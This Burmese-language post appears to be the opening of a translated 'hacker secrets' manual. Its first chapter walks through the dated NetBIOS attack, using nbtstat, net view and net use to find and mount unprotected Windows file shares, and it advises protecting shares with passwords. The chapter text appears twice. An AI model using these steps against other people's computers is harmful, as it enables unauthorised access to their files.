ံဟက္ကာမ်ားဧ။္ လွ်ိဳ႕ဝွက္ခ်က္ ကို ေဖာ္ထုတ္ျခင္းႏွင့္ မွ်ေဝျခင္း နိဒါန္း....
ဒါေလးက နိဒါန္းေလးပ်ိဳးထားတာပါ။ ေနာက္ပိုစ့္ကစၿပီး အခန္း ၁ ျဖစ္ပါလိမ့္မယ္။DISCLAIMER
The author of this manual will like to express my concerns about the misuse
of the information contained in this manual. By reading this manual you
agree to the following stipulations. Any actions and or activities related to the
material contained within this manual is solely your responsibility.
The misuse of the information in this manual can result in
criminal charges brought against the persons in question. The
authors will not be held responsible in the event any criminal
charges be brought against any individuals misusing the
information in this manual to break the law.
(Note This manual was created for Information purposes only.)
စကားဦး
ေန႔စဥ္နဲ႔အမွ် ႀကီးထြားလာတဲ့ Internet ထဲမွာ ကၽႊန္ေတာ္ႏွင့္ စာဖတ္သူတို႔ဟာ ႀကီးမားက်ယ္ေျပာလွတဲ့ သတင္းအခ်က္အလက္ ပင္လယ္ျပင္ႀကီးထဲက ေရေပါက္ငယ္ေလးပမာပါပဲ။ ကိုယ္မသိတဲ့ကိစၥက ကိုယ့္ကိုအမွဳမပတ္ႏိုင္ဘူးလို႔ ေျပာၾကေပမဲ့ အင္တာနက္ႏွင့္ပတ္သက္လာရင္ ဒါကဆန္႔က်င္မွဳတစ္ခုပါ။ အင္တာနက္ေပၚမွာ သန္းေပါင္းမ်ားစြာေသာ ကြန္ပ်ဳတာအသံုးျပဳေတြဟာ ဝင္လိုက္ထြက္လိုက္ရွိေနပါတယ္။ သတင္းအခ်က္အလက္ေတြဟာ ရြာကေန ၿမိဳ႕အကြာအေဝးကို ႏွလံုးခုန္ႏွဳန္းတစ္ခ်က္မွာ ပို႔ေပးေနပါတယ္။
စာဖတ္သူလို သာမန္အသံုးျပဳသူေတြ အတြက္ ျမန္ဆန္လွေသာ သတင္းအခ်က္အလက္ လမ္းမႀကီးေပၚမွာ အႏၱရာယ္မ်ားလွပါေပတယ္။ ၃၀ မွ ၄၀ ရာခိုင္ႏွဳန္း အသံုးျပဳသူေတြဟာ ကြန္ပ်ဳတာေတြရဲ့ ေနာက္ကြယ္မွာ ဘာေတြအလုပ္လုပ္ေနလဲဆိုတာ သတိမထားမိၾကပါဘူး။ က်န္တဲ့ အသံုးျပဳသူေတြဟာ မိမိရဲ့ စနစ္ဟာ တိုက္ခိုက္ျခင္း၊ အသံုးျပဳခံေနရျခင္းကို ရိုးသားစြာ ဂရုမစိုက္ျခင္း၊ သိရွိႏိုင္ေသာ အေျခခံအသိ မရွိၾကပါဘူး
စာဖတ္သူဟာ မိမိရဲ့ အင္တာနက္ေပၚမွ လြတ္လပ္ခြင့္ကို သိရွိလိုတဲ့အတြက္ ဖတ္ေနျခင္းလို႔ယူဆပါသည္။ ျဖစ္လဲျဖစ္သင့္ပါသည္။ အင္တာနက္ေပၚမွာ ဘယ္အရာမွ မိမိရဲ့ မ်က္စိနဲ႔ျမင္ရာတဲ့တိုင္းဟာ မိမိမ်က္စိနဲ႔ျမင္တဲ့အတိုင္းမဟု
မိမိသိတဲ့ အခ်က္အလက္ဟာ ဘယ္ေတာ့မွ မလံုေလာက္ပါဘူး သတင္းအခ်က္အလက္သည္ စြမ္းအားျဖစ္သည္ႏွင့္အမွ် မိမိဟာသိရွိေလ အင္တာနက္ေပၚက အတုအေယာင္ေတြကို ေရွာင္ႏိုင္ေလျဖစ္ပါလိမ့္မယ္။
ဒီလက္စြဲစာအုပ္မွာ ကၽႊန္ေတာ္ဟာ စာဖတ္သူကို စိုးရိမ္ေစမဲ့ အေၾကာင္းအရာမ်ားကို တင္ျပသြားပါမယ္။ တစ္ခ်ိဳ႕အရာေတြဟာ စာဖတ္သူကို ကြန္ပ်ဳတာရွိျခင္းကို ထင္ေယာင္ထင္မွား ျဖစ္ေကာင္းျဖစ္ေစ ႏိုင္ပါမယ္။ ဒါေပမဲ့ စိတ္ဓါတ္က်စရာ မလိုပါဘူး ဘာျဖစ္လို႔လဲဆိုေတာ့ ကၽႊန္ေတာ္စာေရးသူဟာ စာဖတ္သူ မိမိကိုယ္ကို ဘယ္လိုကြာကြယ္ႏိုင္တယ္ဆိုတာ ေျပာျပသြားမွာပါ။
ဒာင္တာနက္ရဲ့ ဆိုးက်ိဳးေတြကို ေျပာျပရျခင္းဟာ ကၽႊန္ေတာ္က စာဖတ္သူအတြက္ ဘာအႏၱရာယ္ေတြရွိတယ္ဆိုတာ တင္ျပဖို႔လိုအပ္တယ္ ခံစားရလို႔ပါ။
ကၽႊန္ေတာ္ဟာ ဒီလက္စြဲစာအုပ္ကို လမ္းျပအေနႏွင့္ ေရးျခင္းျဖစ္ပါတယ္။ စာဖတ္သူရဲ့ စနစ္တစ္ခုကို Hackers ေတြဟာ ဘယ္လိုထိန္းခ်ဳပ္ခြင့္ရေအာင္ စနစ္ရဲ့အားနည္းခ်က္ေတြ၊ Programs ေတြသံုးၿပီး ယူႏိုင္လဲဆုိတာ ေျပာျပျခင္းျဖစ္ပါတယ္။ ဒီလက္စြဲသည္ အကုန္လံုးကို မတင္ျပႏိုင္ပါ။ သို႔ေသာ္လည္း အေျခခံ နည္းမ်ားသိျခင္းျဖင့္ အကယ္၍ စာဖတ္သူသည္ Hackers ေတြဘာေတြလုပ္လဲ ဘယ္လိုလုပ္လဲ သိရွိပါက မိမိကိုယ္ကို ကြာကြယ္ႏိုင္ရန္ အေနအထားေကာင္းတစ္ခုမွာ ရွိႏိုင္ပါသည္။
စကားခ်ပ္ - ဒီစာအုပ္တစ္အုပ္လံုးတြင္ Hacker ကို Reference စကားလံုးအေနနဲ႔ သံုးစြဲသြားမွာျဖစ္ပါသည္။ Hacker မ်ားသည္ မီဒီယာမ်ားဧ။္ ေရာင္းေကာင္းေသာ စကားလံုးတစ္လံုးအေနျဖင့္ အသံုးခ်ျခင္းေၾကာင့္ လူေတြသည္ အထင္မွားလ်က္ရွိပါသည္။ သို႔ပါေသာ္လည္း Hacker ဆိုေသာစကားလံုးကို စာေရးရာတြင္လြယ္ကူေစရန္ အလို႔ငွာ သံုးစြဲျခင္းသာျဖစ္ပါသည္။
ေအာက္ပါ အေၾကာင္းအရာမ်ားသည္ တင္ျပသြားမဲ့ အေၾကာင္းအရာေတြက အနည္းငယ္ပါ။
Hackers ေတြ ဘယ္လို စနစ္တစ္ခုလဲ ဝင္ေရာက္လဲ
ဘယ္လို အရာေတြ အသံုးျပဳလဲ
ဟက္ကာတစ္ေယာက္ဟာ စာဖတ္သူဧ။္ အိမ္ကို စာဖတ္သူဧ။္ ကြန္ပ်ဳတာမွ ဘယ္လိုေစာင့္ၾကည့္ႏိုင္ပံု (ျမန္မာျပည္ဧ။္ Dial Up လိပ္ႏွဳန္း နဲ႔ေတာ့မယံုခ်င္ဘူးထင္ပါတယ္။ ဒါေပမဲ့ ဘယ္လိုလုပ္ႏိုင္လဲဆိုတာ ေျပာျပသြားပါမယ္။)
ဘယ္လို အခ်က္အလက္ေတြကို အခြင့္ရွိပံု ႏွင့္ စာဖတ္သူဘာေၾကာင့္ ကာကြယ္သင့္ပံု
ဘယ္လို သတင္း ႏွင့္ လွည့္ဖ်ားမွဳမ်ား အသံုးျခပံု
Antivirus software တစ္ခုထဲႏွင့္ မလံုေလာက္ပံု
ဘာေတြကို ဂရုစိုက္ရမလဲ အကယ္၍ စာဖတ္သူဧ။္ ကြန္ပ်ဳတာသည္ က်ဳးေက်ာ္ခံရပါက
ဘယ္လိုအေၾကာင္းျပခ်က္နဲ႔မွ ကၽႊန္ေတာ္စာေရးသူသည္ ဒီလက္စြဲသည္ စာဖတ္သူကို အလံုးစံုကာကြယ္မွဳေပးမယ္လို႔ ရယ္ဖြယ္ေကာင္းေသာ အာမခံခ်က္ကို မေပးပါ။ ကၽႊန္ေတာ္ ေျပာျပမဲ့ အေၾကာင္းအရာမ်ားကို ေလ့လာၿပီးေတာ့ စာဖတ္သူသည္မိမိကိုယ္ေရးအခ်က္
စာဖတ္သူသည္ အင္တာနက္ကို ၂၄ နာရီ (သို႔) ၁၅ မိနစ္ ဆက္သြယ္ျခင္းဟာ မိမိဧ။္စနစ္အႏၱရာယ္ရွိမွဳ မရွိမွဳႏွင့္ မဆိုင္ပါ။ ၁၅မိနစ္တြင္းမွာပင္ စာဖတ္သူဧ။္ ကိုယ္ပိုင္စနစ္ကပင္ စာဖတ္သူကို ဝင္ခြင့္ပိတ္ထားႏိုင္ျခင္း၊ စာဖတ္သူဧ။္ ဘဏ္အခ်က္အလက္ ၊ ကိုယ္ပိုင္လိပ္စာမ်ား ပါသြားႏိုင္ပါသည္။
ကၽႊန္ေတာ္သည္ စာဖတ္သူကို စိတ္ေခ်ာက္ခ်ားေအာင္ ျပဳလုပ္ေနျခင္းမဟုတ္ပါ။ ကၽႊန္ေတာ္ေျပာေနျခင္းသည္ အကယ္၍ စာဖတ္သူဂရုမစိုက္ပါက စာဖတ္သူကိုယ္တိုင္ပင္ အႏၱရာယ္ကို တံခါးဖြင့္ေပးသလိုပါပဲ။ စာဖတ္သူသည္ ကၽႊန္ေတာ့္ကို အထင္အလဲြေကာင္းလဲြႏိုင္ပါသည္။ ကၽႊန္ေတာ့္ကို စာဖတ္သူသည္ စာဖတ္သူသည္ Email စစ္ျခင္းႏွင့္ Chat ျခင္းကလဲြရင္ ဘာမွမလုပ္တဲ့အတြက္ ဒါေတြမျဖစ္ႏိုင္ပါဘူးလို႔ ေျပာဆိုေကာင္းေျပာဆိုပါလိမ့္မယ္
ဟက္ကာမ်ားဧ။္ လွ်ိဳ႕ဝွက္ခ်က္ ကို ေဖာ္ထုတ္ျခင္းႏွင့္ မွ်ေဝျခင္း (၁)....
အခန္း ၁ (ကြန္ပ်ဳတာကို ၁၅ စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း)
ကြန္ပ်ဳတာကို ၁၅ စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း…
မွန္ပါသည္။ လုပ္လို႔ရပါတယ္။ အကယ္၍စာဖတ္သူဧ။္ စနစ္သည္ တိက်ေသာ လံုျခံဳေရးအားနည္းခ်က္မ်ား ရွိပါက ၁၅ စကၠန္႔ပိုင္းအတြင္းပင္ ခ်ိဳးေဖာက္ခံႏိုင္ရပါသည္။
ဒီအခန္းကိုစတင္ဖို႔အတြက္ ကၽႊန္ေတာ္စာဖတ္သူကို လုပ္ခိုင္းစရာတစ္ခ်ိဳ႕ရွိပါသည္။ အကယ္၍စာဖတ္သူသည္ Dial Up အသံုးျပဳပါက ခ်ိတ္ဆက္ဖို႔လိုပါလိမ့္မယ္။ DSL (သို႕) Cable သံုးပါက ဒီအဆင့္ကိုတခါတည္း ျပဳလုပ္ႏိုင္ပါသည္။
Windows 2000 ထိ OS မ်ားအတြက္
• Start Menu ကိုႏွိပ္ပါ
• Run ကိုရွာၿပီး ႏွိပ္ပါ
• Winipcfg ကို Box ထဲတြင္ ရိုက္ထဲ့ၿပီး Enter ႏွိပ္ပါ
• ဒီ Windows ေလးကို ျမင္ေတြ႕ရပါမယ္

Windows XP အထက္ OS မ်ားအတြက္
• Start Menu ကိုႏွိပ္ပါ
• Run ကိုရွာၿပီး ႏွိပ္ပါ
• cmd ကို Box ထဲတြင္ ရိုက္ထဲ့လိုက္ပါ

• Console ေပၚလာေသာအခါ ipconfig ဆိုၿပီးရိုက္ပါ (သို႔) Network နဲ႔ပတ္သက္တဲ့ အခ်က္အလက္အကုန္ေတြ႕ခ်င္ပါက ipconfig /all ရိုက္လို႔လဲရပါတယ္
• ဒီအဆင့္ကိုျမင္ေတြ႕ရပါမယ္

* For editorial reason the above info has been omitted *
IP Add ေနရာမွာ ျမင္ရမွာေတြကေတာ့ ဒီလိုမ်ိဳးဂဏန္းေတြပါ။ 207.66.55.1 (ကြဲျပားႏိုင္ပါသည္။)
အကယ္၍ Dial Up အသံုးျပဳပါက IP add ကို PPP Adapter ေအာက္မွာရွာေတြ႕မွာပါ။ အကယ္၍ တစ္ျခားနည္းလမ္းမ်ားကို အသံုးျပဳဆက္သြယ္ပါက IP add ေတြကို တစ္ျခား Adapter Name ေတြေအာက္မွာ ရွာေတြ႕မွာျဖစ္မွာပါ။ List ေတြကို ေဖာ္ျပထားေသာ ျမွားေနရာကို ႏွိပ္ျခင္းျဖင့္ ထပ္ေတြ႕ႏိုင္ပါမယ္။

IP Add ကိုသိေသာအခါမွာ ေနာက္ထပ္ Console တစ္ခုကိုထပ္ဖြင့္ၿပီး Console ထဲမွာ ဒါကိုရိုက္ထဲ့ရမွာပါ။
Nbtstat –A ip add (ဥပမာ nbtstat –A 207.66.55.1) ဒီေနရာမွာေတာ့ A သည္ Capital Letter ျဖစ္ရပါမယ္။ nbtstat commands မ်ားကို ထပ္သိခ်င္တယ္ဆိုရင္ ဒါကို ရိုက္ၿပီးေလ့လာႏိုင္ပါသည္။ nbtstat /help
ဒီလိုပံုစံ Output ေလးကိုေတြ႕ရမွာပါ။
NetBIOS Remote Machine Name Table
______________________________ ______
Name Type Status
------------------------------ -------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01> GROUP Registered
(Again info has been omitted due to privacy reasons)
< > ထဲမွာရွိတဲ့ ဂဏန္းေတြဟာ Hex Code တန္ဖိုးေတြျဖစ္ပါတယ္။ ဒါေပမဲ့ ဒီမွာ ကၽႊန္ေတာ္စိတ္ဝင္စားတာက <20> တန္ဖိုးပါတဲ့ Hex code ပါ။ အကယ္၍ 20 ကိုမေတြ႕ရင္ေတာ့ ဒါစာဖတ္သူအတြက္ သတင္းေကာင္းပါပဲ။ မဟုတ္ရင္ေတာ့ စာဖတ္သူ စဥ္းစားစရာေတြ ရွိလာပါလိမ့္မယ္။ ကၽႊန္ေတာ္ေရးသားကိုဖတ္ၿပီး စာဖတ္သူနားရွဳပ္သြားႏိုင္ပါတယ္။
ကဲ ရွင္းျပပါရေစ။ <20> ဆုိသည္မွာ စာဖတ္သူဧ။္ ကြန္ပ်ဳတာမွာ File and Printer Sharing ကိုဖြင့္ေပးထားလို႔ပဲ ျဖစ္ပါသည္။ ဒါက ဟက္ကာတစ္ေယာက္က စာဖတ္သူ ကြန္ပ်ဳတာဟာ File and Printer Sharing ကိုဖြင့္ေပးထားလား သိခ်င္ရင္ လုပ္မဲ့ အဆင့္ေတြပါ။ အကယ္၍ ဖြင့္ေပးထားတယ္ဆိုတာကို သိရွိပါက ဟက္ကာေတြက စနစ္ကိုထိန္းခ်ဳပ္ခြင့္ရရန္ ဆက္လုပ္သြားမွာပါ။
Note : Console ကထြက္ရန္ Exit လို႔ရိုက္ၿပီး Enter ႏွိပ္ထြက္ႏိုင္ပါသည္။
အထက္ပါ အခ်က္အလက္ေတြကိုသံုးၿပီး ဘယ္လိုထိန္းခ်ဳပ္ခြင့္ရေအာင္ လုပ္ႏိုင္လဲဆိုတာ ဒီေနရာကစၿပီး ကၽႊန္ေတာ္ရွင္းျပသြားပါမယ္။
အလားအလာရွိတဲ့ ဟက္ကာတစ္ေယာက္ဟာ IP Add အစုတစ္ခုကို Scan လုပ္ၿပီး File and Printer Sharing ကြန္ပ်ဳတာစနစ္ေတြကို ရွာေဖြမွာပါ။ ေတြ႕ရွိတာနဲ႔ခ်က္ျခင္း ဘာေတြစက္ေပၚမွာ မွ်ေဝထားလဲဆိုတာကို ဒီလိုၾကည့္ရွဳႏိုင္ပါသည္။ ဘယ္လိုလဲဆိုေတာ့ net view \\
ထို႕ေနာက္ ဒီလုိပံုစံကိုရရွိမွာပါ။
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
ဒါက ဟက္ကာကို ဘာေဖာ္ျပလဲဆိုေတာ့ သူ႕ရဲ့အလားအလာရွိတဲ့ သားေကာင္ဟာ သူဧ။္ My Documents ႏွင့္ Temp ဆိုတဲ့ Folders ႏွစ္ခုကို ကြန္ယက္ေပၚမွာ မွ်ေဝထားပါတယ္။ ထုိအထက္ပါအရာေတြကို လုပ္ပိုင္ခြင့္ရရွိရန္ ဟက္ကာသည္ ဒီ command ကို အသံုးခ်သြားမွာပါ။
Net use x: \\\temp
Folder သည္ စကားဝွက္သို႔ ခံထားျခင္းမရွိပါက ဟက္ကာသည္ လြယ္လြယ္ကူကူပင္ ဝင္ခြင့္ရွိသြားမွာျဖစ္ပါသည္။ ဒီမွာ ကၽႊန္ေတာ္ေမးခ်င္တာက ဒါေတြကိုျပဳလုပ္ရန္ ဘယ္ေလာက္မ်ားၾကာႏိုင္ခဲ့လို႔လဲ။ စာဖတ္သူဧ။္ အေျဖကေကာ...
အၾကာႀကီးေတာ့ မဟုတ္ေလာက္ပါဘူး။ ဟုတ္တယ္ဟုတ္။ စာဖတ္သူတို႔ ဘယ္ႏွစ္ေယာက္မ်ားက File and Printer Sharing အေၾကာင္းမသိပဲနဲ႔ ဖြင့္ထားမိပါလဲ။
ဟုတ္ကဲ့ Ladies and Gentlemen။ ဒါကို Netbios Attack လို႔ေခၚပါတယ္။ အကယ္၍ မိမိအိမ္တြင္ အိမ္တြင္းကြန္ရက္ ခ်ိတ္ဆက္ထားရင္ ျဖစ္ႏိုင္တာက စာဖတ္သူဟာ File and Printer Sharing ကိုဖြင့္ထားႏိုင္ပါသည္။ စာဖတ္သူအကုန္လံုးဟာ ဒီလိုလုပ္ထားတယ္လို႔ ကၽႊန္ေတာ္မဆိုလိုပါ။ ဒါေပမဲ့ လုပ္တဲ့လူေတြအမ်ားႀကီးပါ။ အကယ္၍ မိမိသည္ ကြန္ရက္ေပၚမွာ အရင္းအျမစ္ေတြကို မွ်ေဝထားတယ္ဆိုရင္ Directory မ်ားကို စကားဝွက္ျဖင့္ ကာကြယ္ထားရန အၾကံေပးပါရေစ။ မိမိသည္ ကြန္ရက္ေပၚမွာ မွ်ေဝထားေသာ Directory မွန္သမွ် ဒီလုိပံုစံ မ်ိဳး Icon ေလးကို ေတြ႕ရွိရမွာပါ။
မိမိဧ။္ ကြန္ပ်ဳတာမွ မွ်ေဝထားေသာ အရင္းအျမစ္မ်ားကို ရွာေဖြရန္ ဒီအဆင့္မ်ားျပဳလုပ္ႏိုင္ပါသည္။
Console ကို ဖြင့္လိုက္ပါ။ မသိရင္ အေပၚမွာ ျပန္ရွာဖတ္ၾကည့္ပါ။ Console ထဲကို ေရာက္သာအခါ net share ဆိုၿပီး ရိုက္္ၾကည့္ပါ။ net share command သည္ မိမိ မွ်ေဝထားေသာ အရာမ်ားကို နာမည္ႏွင့္ ေနရာပါ ျပသႏိုင္ပါသည္။ မွ်ေဝထားေသာ အရာေတြထဲက $ sign ပါေသာ အရာမ်ားသည္ Administrative Shares မ်ားျဖစ္ပါသည္။ ေတာ္ေတာ္မ်ားမ်ားကို Windows သည္ သူ႔ဘာသာသူ Administrative Shares မ်ားအျဖစ္သတ္မွတ္ထားပါသည္။ ျပင္ဆင္ခ်င္ပါက ေသခ်ာအရင္ ေလ့လာေစခ်င္ပါသည္။
Netbios သည္ေရွးက်ေသာ စနစ္က်ဳးေက်ာ္ေသာ နည္းလမ္းတစ္ခုျဖစ္ပါသည္။ စနစ္မ်ားစြာသည္ ပံုမွန္ ကာကြယ္ေပးထားသျဖင့္ တစ္ခ်ိဳ႕သည္ သတိမမူမိပဲ ေသခ်ာကာကြယ္မွဳ အတ္ုင္းအဆမ်ား မလုပ္မိေသာေၾကာင့္ ေနာက္ပိုင္းတြင္ Netbios Attack သည္ လုပ္ခံရေသာ သားေကာင္မ်ား ျပန္လည္ျမင့္မားလာရသည္။
ဒီစာအုပ္ေနာက္ပိုင္းတြင္ အေျခခံကာကြယ္နည္းအခ်ိဳ႕ကို ေရးသားသြားပါမည္။ ဒီေနရာထိတုိင္ေအာင္ အလားအလာရွိေသာ အားနည္းခ်က္မ်ားကို ေရးသားရန္ စိတ္အားသန္ေနပါသျဖင့္ ေစာင့္ဖတ္ရန္ ေျပာၾကားလိုပါသည္။
ကြန္ပ်ဳတာကို ၁၅ စကၠန႔္ အတြင္းထုိးေဖာက္ျခင္း…
မွန္ပါသည္။ လုပ္လို႔ရပါတယ္။ အကယ္၍စာဖတ္သူဧ။္ စနစ္သည္ တိက်ေသာ လံုျခံဳေရးအားနည္းခ်က္မ်ား ရွိပါက ၁၅ စကၠန္႔ပိုင္းအတြင္းပင္ ခ်ိဳးေဖာက္ခံႏိုင္ရပါသည္။
ဒီအခန္းကိုစတင္ဖို႔အတြက္ ကၽႊန္ေတာ္စာဖတ္သူကို လုပ္ခိုင္းစရာတစ္ခ်ိဳ႕ရွိပါသည္။ အကယ္၍စာဖတ္သူသည္ Dial Up အသံုးျပဳပါက ခ်ိတ္ဆက္ဖို႔လိုပါလိမ့္မယ္။ DSL (သို႕) Cable သံုးပါက ဒီအဆင့္ကိုတခါတည္း ျပဳလုပ္ႏိုင္ပါသည္။
Windows 2000 ထိ OS မ်ားအတြက္
• Start Menu ကိုႏွိပ္ပါ
• Run ကိုရွာၿပီး ႏွိပ္ပါ
• Winipcfg ကို Box ထဲတြင္ ရိုက္ထဲ့ၿပီး Enter ႏွိပ္ပါ
• ဒီ Windows ေလးကို ျမင္ေတြ႕ရပါမယ္

Windows XP အထက္ OS မ်ားအတြက္
• Start Menu ကိုႏွိပ္ပါ
• Run ကိုရွာၿပီး ႏွိပ္ပါ
• cmd ကို Box ထဲတြင္ ရိုက္ထဲ့လိုက္ပါ

• Console ေပၚလာေသာအခါ ipconfig ဆိုၿပီးရိုက္ပါ (သို႔) Network နဲ႔ပတ္သက္တဲ့ အခ်က္အလက္အကုန္ေတြ႕ခ်င္ပါက ipconfig /all ရိုက္လို႔လဲရပါတယ္
• ဒီအဆင့္ကိုျမင္ေတြ႕ရပါမယ္

* For editorial reason the above info has been omitted *
IP Add ေနရာမွာ ျမင္ရမွာေတြကေတာ့ ဒီလိုမ်ိဳးဂဏန္းေတြပါ။ 207.66.55.1 (ကြဲျပားႏိုင္ပါသည္။)
အကယ္၍ Dial Up အသံုးျပဳပါက IP add ကို PPP Adapter ေအာက္မွာရွာေတြ႕မွာပါ။ အကယ္၍ တစ္ျခားနည္းလမ္းမ်ားကို အသံုးျပဳဆက္သြယ္ပါက IP add ေတြကို တစ္ျခား Adapter Name ေတြေအာက္မွာ ရွာေတြ႕မွာျဖစ္မွာပါ။ List ေတြကို ေဖာ္ျပထားေသာ ျမွားေနရာကို ႏွိပ္ျခင္းျဖင့္ ထပ္ေတြ႕ႏိုင္ပါမယ္။

IP Add ကိုသိေသာအခါမွာ ေနာက္ထပ္ Console တစ္ခုကိုထပ္ဖြင့္ၿပီး Console ထဲမွာ ဒါကိုရိုက္ထဲ့ရမွာပါ။
Nbtstat –A ip add (ဥပမာ nbtstat –A 207.66.55.1) ဒီေနရာမွာေတာ့ A သည္ Capital Letter ျဖစ္ရပါမယ္။ nbtstat commands မ်ားကို ထပ္သိခ်င္တယ္ဆိုရင္ ဒါကို ရိုက္ၿပီးေလ့လာႏိုင္ပါသည္။ nbtstat /help
ဒီလိုပံုစံ Output ေလးကိုေတြ႕ရမွာပါ။
NetBIOS Remote Machine Name Table
______________________________
Name Type Status
------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01> GROUP Registered
(Again info has been omitted due to privacy reasons)
< > ထဲမွာရွိတဲ့ ဂဏန္းေတြဟာ Hex Code တန္ဖိုးေတြျဖစ္ပါတယ္။ ဒါေပမဲ့ ဒီမွာ ကၽႊန္ေတာ္စိတ္ဝင္စားတာက <20> တန္ဖိုးပါတဲ့ Hex code ပါ။ အကယ္၍ 20 ကိုမေတြ႕ရင္ေတာ့ ဒါစာဖတ္သူအတြက္ သတင္းေကာင္းပါပဲ။ မဟုတ္ရင္ေတာ့ စာဖတ္သူ စဥ္းစားစရာေတြ ရွိလာပါလိမ့္မယ္။ ကၽႊန္ေတာ္ေရးသားကိုဖတ္ၿပီး စာဖတ္သူနားရွဳပ္သြားႏိုင္ပါတယ္။
ကဲ ရွင္းျပပါရေစ။ <20> ဆုိသည္မွာ စာဖတ္သူဧ။္ ကြန္ပ်ဳတာမွာ File and Printer Sharing ကိုဖြင့္ေပးထားလို႔ပဲ ျဖစ္ပါသည္။ ဒါက ဟက္ကာတစ္ေယာက္က စာဖတ္သူ ကြန္ပ်ဳတာဟာ File and Printer Sharing ကိုဖြင့္ေပးထားလား သိခ်င္ရင္ လုပ္မဲ့ အဆင့္ေတြပါ။ အကယ္၍ ဖြင့္ေပးထားတယ္ဆိုတာကို သိရွိပါက ဟက္ကာေတြက စနစ္ကိုထိန္းခ်ဳပ္ခြင့္ရရန္ ဆက္လုပ္သြားမွာပါ။
Note : Console ကထြက္ရန္ Exit လို႔ရိုက္ၿပီး Enter ႏွိပ္ထြက္ႏိုင္ပါသည္။
အထက္ပါ အခ်က္အလက္ေတြကိုသံုးၿပီး ဘယ္လိုထိန္းခ်ဳပ္ခြင့္ရေအာင္ လုပ္ႏိုင္လဲဆိုတာ ဒီေနရာကစၿပီး ကၽႊန္ေတာ္ရွင္းျပသြားပါမယ္။
အလားအလာရွိတဲ့ ဟက္ကာတစ္ေယာက္ဟာ IP Add အစုတစ္ခုကို Scan လုပ္ၿပီး File and Printer Sharing ကြန္ပ်ဳတာစနစ္ေတြကို ရွာေဖြမွာပါ။ ေတြ႕ရွိတာနဲ႔ခ်က္ျခင္း ဘာေတြစက္ေပၚမွာ မွ်ေဝထားလဲဆိုတာကို ဒီလိုၾကည့္ရွဳႏိုင္ပါသည္။ ဘယ္လိုလဲဆိုေတာ့ net view \\
ထို႕ေနာက္ ဒီလုိပံုစံကိုရရွိမွာပါ။
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
ဒါက ဟက္ကာကို ဘာေဖာ္ျပလဲဆိုေတာ့ သူ႕ရဲ့အလားအလာရွိတဲ့ သားေကာင္ဟာ သူဧ။္ My Documents ႏွင့္ Temp ဆိုတဲ့ Folders ႏွစ္ခုကို ကြန္ယက္ေပၚမွာ မွ်ေဝထားပါတယ္။ ထုိအထက္ပါအရာေတြကို လုပ္ပိုင္ခြင့္ရရွိရန္ ဟက္ကာသည္ ဒီ command ကို အသံုးခ်သြားမွာပါ။
Net use x: \\\temp
Folder သည္ စကားဝွက္သို႔ ခံထားျခင္းမရွိပါက ဟက္ကာသည္ လြယ္လြယ္ကူကူပင္ ဝင္ခြင့္ရွိသြားမွာျဖစ္ပါသည္။ ဒီမွာ ကၽႊန္ေတာ္ေမးခ်င္တာက ဒါေတြကိုျပဳလုပ္ရန္ ဘယ္ေလာက္မ်ားၾကာႏိုင္ခဲ့လို႔လဲ။ စာဖတ္သူဧ။္ အေျဖကေကာ...
အၾကာႀကီးေတာ့ မဟုတ္ေလာက္ပါဘူး။ ဟုတ္တယ္ဟုတ္။ စာဖတ္သူတို႔ ဘယ္ႏွစ္ေယာက္မ်ားက File and Printer Sharing အေၾကာင္းမသိပဲနဲ႔ ဖြင့္ထားမိပါလဲ။
ဟုတ္ကဲ့ Ladies and Gentlemen။ ဒါကို Netbios Attack လို႔ေခၚပါတယ္။ အကယ္၍ မိမိအိမ္တြင္ အိမ္တြင္းကြန္ရက္ ခ်ိတ္ဆက္ထားရင္ ျဖစ္ႏိုင္တာက စာဖတ္သူဟာ File and Printer Sharing ကိုဖြင့္ထားႏိုင္ပါသည္။ စာဖတ္သူအကုန္လံုးဟာ ဒီလိုလုပ္ထားတယ္လို႔ ကၽႊန္ေတာ္မဆိုလိုပါ။ ဒါေပမဲ့ လုပ္တဲ့လူေတြအမ်ားႀကီးပါ။ အကယ္၍ မိမိသည္ ကြန္ရက္ေပၚမွာ အရင္းအျမစ္ေတြကို မွ်ေဝထားတယ္ဆိုရင္ Directory မ်ားကို စကားဝွက္ျဖင့္ ကာကြယ္ထားရန အၾကံေပးပါရေစ။ မိမိသည္ ကြန္ရက္ေပၚမွာ မွ်ေဝထားေသာ Directory မွန္သမွ် ဒီလုိပံုစံ မ်ိဳး Icon ေလးကို ေတြ႕ရွိရမွာပါ။
မိမိဧ။္ ကြန္ပ်ဳတာမွ မွ်ေဝထားေသာ အရင္းအျမစ္မ်ားကို ရွာေဖြရန္ ဒီအဆင့္မ်ားျပဳလုပ္ႏိုင္ပါသည္။
Console ကို ဖြင့္လိုက္ပါ။ မသိရင္ အေပၚမွာ ျပန္ရွာဖတ္ၾကည့္ပါ။ Console ထဲကို ေရာက္သာအခါ net share ဆိုၿပီး ရိုက္္ၾကည့္ပါ။ net share command သည္ မိမိ မွ်ေဝထားေသာ အရာမ်ားကို နာမည္ႏွင့္ ေနရာပါ ျပသႏိုင္ပါသည္။ မွ်ေဝထားေသာ အရာေတြထဲက $ sign ပါေသာ အရာမ်ားသည္ Administrative Shares မ်ားျဖစ္ပါသည္။ ေတာ္ေတာ္မ်ားမ်ားကို Windows သည္ သူ႔ဘာသာသူ Administrative Shares မ်ားအျဖစ္သတ္မွတ္ထားပါသည္။ ျပင္ဆင္ခ်င္ပါက ေသခ်ာအရင္ ေလ့လာေစခ်င္ပါသည္။
